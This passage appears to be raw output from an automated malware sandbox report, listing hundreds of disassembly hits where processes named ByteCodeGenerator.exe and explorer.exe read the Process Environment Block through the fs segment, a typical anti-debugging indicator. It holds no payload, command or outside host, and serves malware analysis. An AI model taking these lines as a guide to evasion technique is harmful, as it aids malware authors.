          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345002D mov eax, dword ptr fs:[00000030h]3_2_0345002D
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345002D mov eax, dword ptr fs:[00000030h]3_2_0345002D
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345002D mov eax, dword ptr fs:[00000030h]3_2_0345002D
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0343B02A mov eax, dword ptr fs:[00000030h]3_2_0343B02A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0343B02A mov eax, dword ptr fs:[00000030h]3_2_0343B02A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0343B02A mov eax, dword ptr fs:[00000030h]3_2_0343B02A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0343B02A mov eax, dword ptr fs:[00000030h]3_2_0343B02A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034BB8D0 mov eax, dword ptr fs:[00000030h]3_2_034BB8D0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034BB8D0 mov ecx, dword ptr fs:[00000030h]3_2_034BB8D0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034BB8D0 mov eax, dword ptr fs:[00000030h]3_2_034BB8D0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034BB8D0 mov eax, dword ptr fs:[00000030h]3_2_034BB8D0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034BB8D0 mov eax, dword ptr fs:[00000030h]3_2_034BB8D0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034BB8D0 mov eax, dword ptr fs:[00000030h]3_2_034BB8D0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034258EC mov eax, dword ptr fs:[00000030h]3_2_034258EC
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03429080 mov eax, dword ptr fs:[00000030h]3_2_03429080
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A3884 mov eax, dword ptr fs:[00000030h]3_2_034A3884
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A3884 mov eax, dword ptr fs:[00000030h]3_2_034A3884
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034520A0 mov eax, dword ptr fs:[00000030h]3_2_034520A0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034520A0 mov eax, dword ptr fs:[00000030h]3_2_034520A0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034520A0 mov eax, dword ptr fs:[00000030h]3_2_034520A0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034520A0 mov eax, dword ptr fs:[00000030h]3_2_034520A0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034520A0 mov eax, dword ptr fs:[00000030h]3_2_034520A0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034520A0 mov eax, dword ptr fs:[00000030h]3_2_034520A0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034690AF mov eax, dword ptr fs:[00000030h]3_2_034690AF
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345F0BF mov ecx, dword ptr fs:[00000030h]3_2_0345F0BF
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345F0BF mov eax, dword ptr fs:[00000030h]3_2_0345F0BF
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345F0BF mov eax, dword ptr fs:[00000030h]3_2_0345F0BF
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0343EF40 mov eax, dword ptr fs:[00000030h]3_2_0343EF40
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0343FF60 mov eax, dword ptr fs:[00000030h]3_2_0343FF60
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F8F6A mov eax, dword ptr fs:[00000030h]3_2_034F8F6A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F070D mov eax, dword ptr fs:[00000030h]3_2_034F070D
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F070D mov eax, dword ptr fs:[00000030h]3_2_034F070D
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345A70E mov eax, dword ptr fs:[00000030h]3_2_0345A70E
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345A70E mov eax, dword ptr fs:[00000030h]3_2_0345A70E
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0344F716 mov eax, dword ptr fs:[00000030h]3_2_0344F716
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034BFF10 mov eax, dword ptr fs:[00000030h]3_2_034BFF10
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034BFF10 mov eax, dword ptr fs:[00000030h]3_2_034BFF10
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03424F2E mov eax, dword ptr fs:[00000030h]3_2_03424F2E
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03424F2E mov eax, dword ptr fs:[00000030h]3_2_03424F2E
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345E730 mov eax, dword ptr fs:[00000030h]3_2_0345E730
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034637F5 mov eax, dword ptr fs:[00000030h]3_2_034637F5
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03438794 mov eax, dword ptr fs:[00000030h]3_2_03438794
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A7794 mov eax, dword ptr fs:[00000030h]3_2_034A7794
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A7794 mov eax, dword ptr fs:[00000030h]3_2_034A7794
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A7794 mov eax, dword ptr fs:[00000030h]3_2_034A7794
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03437E41 mov eax, dword ptr fs:[00000030h]3_2_03437E41
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03437E41 mov eax, dword ptr fs:[00000030h]3_2_03437E41
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03437E41 mov eax, dword ptr fs:[00000030h]3_2_03437E41
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03437E41 mov eax, dword ptr fs:[00000030h]3_2_03437E41
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03437E41 mov eax, dword ptr fs:[00000030h]3_2_03437E41
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03437E41 mov eax, dword ptr fs:[00000030h]3_2_03437E41
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034EAE44 mov eax, dword ptr fs:[00000030h]3_2_034EAE44
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034EAE44 mov eax, dword ptr fs:[00000030h]3_2_034EAE44
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0343766D mov eax, dword ptr fs:[00000030h]3_2_0343766D
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0344AE73 mov eax, dword ptr fs:[00000030h]3_2_0344AE73
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0344AE73 mov eax, dword ptr fs:[00000030h]3_2_0344AE73
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0344AE73 mov eax, dword ptr fs:[00000030h]3_2_0344AE73
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0344AE73 mov eax, dword ptr fs:[00000030h]3_2_0344AE73
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0344AE73 mov eax, dword ptr fs:[00000030h]3_2_0344AE73
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0342C600 mov eax, dword ptr fs:[00000030h]3_2_0342C600
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0342C600 mov eax, dword ptr fs:[00000030h]3_2_0342C600
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0342C600 mov eax, dword ptr fs:[00000030h]3_2_0342C600
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03458E00 mov eax, dword ptr fs:[00000030h]3_2_03458E00
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E1608 mov eax, dword ptr fs:[00000030h]3_2_034E1608
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345A61C mov eax, dword ptr fs:[00000030h]3_2_0345A61C
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345A61C mov eax, dword ptr fs:[00000030h]3_2_0345A61C
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0342E620 mov eax, dword ptr fs:[00000030h]3_2_0342E620
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034DFE3F mov eax, dword ptr fs:[00000030h]3_2_034DFE3F
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03468EC7 mov eax, dword ptr fs:[00000030h]3_2_03468EC7
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034536CC mov eax, dword ptr fs:[00000030h]3_2_034536CC
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034DFEC0 mov eax, dword ptr fs:[00000030h]3_2_034DFEC0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F8ED6 mov eax, dword ptr fs:[00000030h]3_2_034F8ED6
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034376E2 mov eax, dword ptr fs:[00000030h]3_2_034376E2
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034516E0 mov ecx, dword ptr fs:[00000030h]3_2_034516E0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034BFE87 mov eax, dword ptr fs:[00000030h]3_2_034BFE87
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F0EA5 mov eax, dword ptr fs:[00000030h]3_2_034F0EA5
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F0EA5 mov eax, dword ptr fs:[00000030h]3_2_034F0EA5
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F0EA5 mov eax, dword ptr fs:[00000030h]3_2_034F0EA5
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A46A7 mov eax, dword ptr fs:[00000030h]3_2_034A46A7
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03463D43 mov eax, dword ptr fs:[00000030h]3_2_03463D43
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A3540 mov eax, dword ptr fs:[00000030h]3_2_034A3540
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03447D50 mov eax, dword ptr fs:[00000030h]3_2_03447D50
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0344C577 mov eax, dword ptr fs:[00000030h]3_2_0344C577
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0344C577 mov eax, dword ptr fs:[00000030h]3_2_0344C577
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0342AD30 mov eax, dword ptr fs:[00000030h]3_2_0342AD30
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]3_2_03433D34
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]3_2_03433D34
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]3_2_03433D34
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]3_2_03433D34
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]3_2_03433D34
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]3_2_03433D34
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]3_2_03433D34
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]3_2_03433D34
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]3_2_03433D34
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]3_2_03433D34
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]3_2_03433D34
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]3_2_03433D34
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03433D34 mov eax, dword ptr fs:[00000030h]3_2_03433D34
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034EE539 mov eax, dword ptr fs:[00000030h]3_2_034EE539
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F8D34 mov eax, dword ptr fs:[00000030h]3_2_034F8D34
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034AA537 mov eax, dword ptr fs:[00000030h]3_2_034AA537
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03454D3B mov eax, dword ptr fs:[00000030h]3_2_03454D3B
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03454D3B mov eax, dword ptr fs:[00000030h]3_2_03454D3B
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03454D3B mov eax, dword ptr fs:[00000030h]3_2_03454D3B
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A6DC9 mov eax, dword ptr fs:[00000030h]3_2_034A6DC9
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A6DC9 mov eax, dword ptr fs:[00000030h]3_2_034A6DC9
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A6DC9 mov eax, dword ptr fs:[00000030h]3_2_034A6DC9
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A6DC9 mov ecx, dword ptr fs:[00000030h]3_2_034A6DC9
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A6DC9 mov eax, dword ptr fs:[00000030h]3_2_034A6DC9
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A6DC9 mov eax, dword ptr fs:[00000030h]3_2_034A6DC9
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0343D5E0 mov eax, dword ptr fs:[00000030h]3_2_0343D5E0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0343D5E0 mov eax, dword ptr fs:[00000030h]3_2_0343D5E0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034EFDE2 mov eax, dword ptr fs:[00000030h]3_2_034EFDE2
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034EFDE2 mov eax, dword ptr fs:[00000030h]3_2_034EFDE2
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034EFDE2 mov eax, dword ptr fs:[00000030h]3_2_034EFDE2
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034EFDE2 mov eax, dword ptr fs:[00000030h]3_2_034EFDE2
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034D8DF1 mov eax, dword ptr fs:[00000030h]3_2_034D8DF1
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03452581 mov eax, dword ptr fs:[00000030h]3_2_03452581
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03452581 mov eax, dword ptr fs:[00000030h]3_2_03452581
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03452581 mov eax, dword ptr fs:[00000030h]3_2_03452581
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03452581 mov eax, dword ptr fs:[00000030h]3_2_03452581
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03422D8A mov eax, dword ptr fs:[00000030h]3_2_03422D8A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03422D8A mov eax, dword ptr fs:[00000030h]3_2_03422D8A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03422D8A mov eax, dword ptr fs:[00000030h]3_2_03422D8A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03422D8A mov eax, dword ptr fs:[00000030h]3_2_03422D8A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03422D8A mov eax, dword ptr fs:[00000030h]3_2_03422D8A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345FD9B mov eax, dword ptr fs:[00000030h]3_2_0345FD9B
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345FD9B mov eax, dword ptr fs:[00000030h]3_2_0345FD9B
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F05AC mov eax, dword ptr fs:[00000030h]3_2_034F05AC
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F05AC mov eax, dword ptr fs:[00000030h]3_2_034F05AC
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034535A1 mov eax, dword ptr fs:[00000030h]3_2_034535A1
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03451DB5 mov eax, dword ptr fs:[00000030h]3_2_03451DB5
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03451DB5 mov eax, dword ptr fs:[00000030h]3_2_03451DB5
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_03451DB5 mov eax, dword ptr fs:[00000030h]3_2_03451DB5
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345A44B mov eax, dword ptr fs:[00000030h]3_2_0345A44B
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034BC450 mov eax, dword ptr fs:[00000030h]3_2_034BC450
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034BC450 mov eax, dword ptr fs:[00000030h]3_2_034BC450
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0344746D mov eax, dword ptr fs:[00000030h]3_2_0344746D
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A6C0A mov eax, dword ptr fs:[00000030h]3_2_034A6C0A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A6C0A mov eax, dword ptr fs:[00000030h]3_2_034A6C0A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A6C0A mov eax, dword ptr fs:[00000030h]3_2_034A6C0A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A6C0A mov eax, dword ptr fs:[00000030h]3_2_034A6C0A
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F740D mov eax, dword ptr fs:[00000030h]3_2_034F740D
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F740D mov eax, dword ptr fs:[00000030h]3_2_034F740D
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F740D mov eax, dword ptr fs:[00000030h]3_2_034F740D
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]3_2_034E1C06
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]3_2_034E1C06
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]3_2_034E1C06
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]3_2_034E1C06
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]3_2_034E1C06
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]3_2_034E1C06
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]3_2_034E1C06
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]3_2_034E1C06
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]3_2_034E1C06
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]3_2_034E1C06
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]3_2_034E1C06
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]3_2_034E1C06
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]3_2_034E1C06
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E1C06 mov eax, dword ptr fs:[00000030h]3_2_034E1C06
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0345BC2C mov eax, dword ptr fs:[00000030h]3_2_0345BC2C
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034F8CD6 mov eax, dword ptr fs:[00000030h]3_2_034F8CD6
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034E14FB mov eax, dword ptr fs:[00000030h]3_2_034E14FB
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A6CF0 mov eax, dword ptr fs:[00000030h]3_2_034A6CF0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A6CF0 mov eax, dword ptr fs:[00000030h]3_2_034A6CF0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_034A6CF0 mov eax, dword ptr fs:[00000030h]3_2_034A6CF0
          Source: C:\Windows\SysWOW64\ByteCodeGenerator.exeCode function: 3_2_0343849B mov eax, dword ptr fs:[00000030h]3_2_0343849B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055C7D50 mov eax, dword ptr fs:[00000030h]12_2_055C7D50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055CB944 mov eax, dword ptr fs:[00000030h]12_2_055CB944
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055CB944 mov eax, dword ptr fs:[00000030h]12_2_055CB944
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055E3D43 mov eax, dword ptr fs:[00000030h]12_2_055E3D43
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05623540 mov eax, dword ptr fs:[00000030h]12_2_05623540
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055AB171 mov eax, dword ptr fs:[00000030h]12_2_055AB171
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055AB171 mov eax, dword ptr fs:[00000030h]12_2_055AB171
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055CC577 mov eax, dword ptr fs:[00000030h]12_2_055CC577
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055CC577 mov eax, dword ptr fs:[00000030h]12_2_055CC577
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055AC962 mov eax, dword ptr fs:[00000030h]12_2_055AC962
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_05678D34 mov eax, dword ptr fs:[00000030h]12_2_05678D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0562A537 mov eax, dword ptr fs:[00000030h]12_2_0562A537
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A9100 mov eax, dword ptr fs:[00000030h]12_2_055A9100
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A9100 mov eax, dword ptr fs:[00000030h]12_2_055A9100
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055A9100 mov eax, dword ptr fs:[00000030h]12_2_055A9100
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0566E539 mov eax, dword ptr fs:[00000030h]12_2_0566E539
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D4D3B mov eax, dword ptr fs:[00000030h]12_2_055D4D3B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D4D3B mov eax, dword ptr fs:[00000030h]12_2_055D4D3B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D4D3B mov eax, dword ptr fs:[00000030h]12_2_055D4D3B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D513A mov eax, dword ptr fs:[00000030h]12_2_055D513A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055D513A mov eax, dword ptr fs:[00000030h]12_2_055D513A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055AAD30 mov eax, dword ptr fs:[00000030h]12_2_055AAD30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]12_2_055B3D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]12_2_055B3D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]12_2_055B3D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]12_2_055B3D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]12_2_055B3D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]12_2_055B3D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]12_2_055B3D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]12_2_055B3D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]12_2_055B3D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]12_2_055B3D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]12_2_055B3D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]12_2_055B3D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055B3D34 mov eax, dword ptr fs:[00000030h]12_2_055B3D34
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055C4120 mov eax, dword ptr fs:[00000030h]12_2_055C4120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055C4120 mov eax, dword ptr fs:[00000030h]12_2_055C4120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055C4120 mov eax, dword ptr fs:[00000030h]12_2_055C4120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_055C4120 mov eax, dword ptr fs:[00000030h]12_2_055C4120
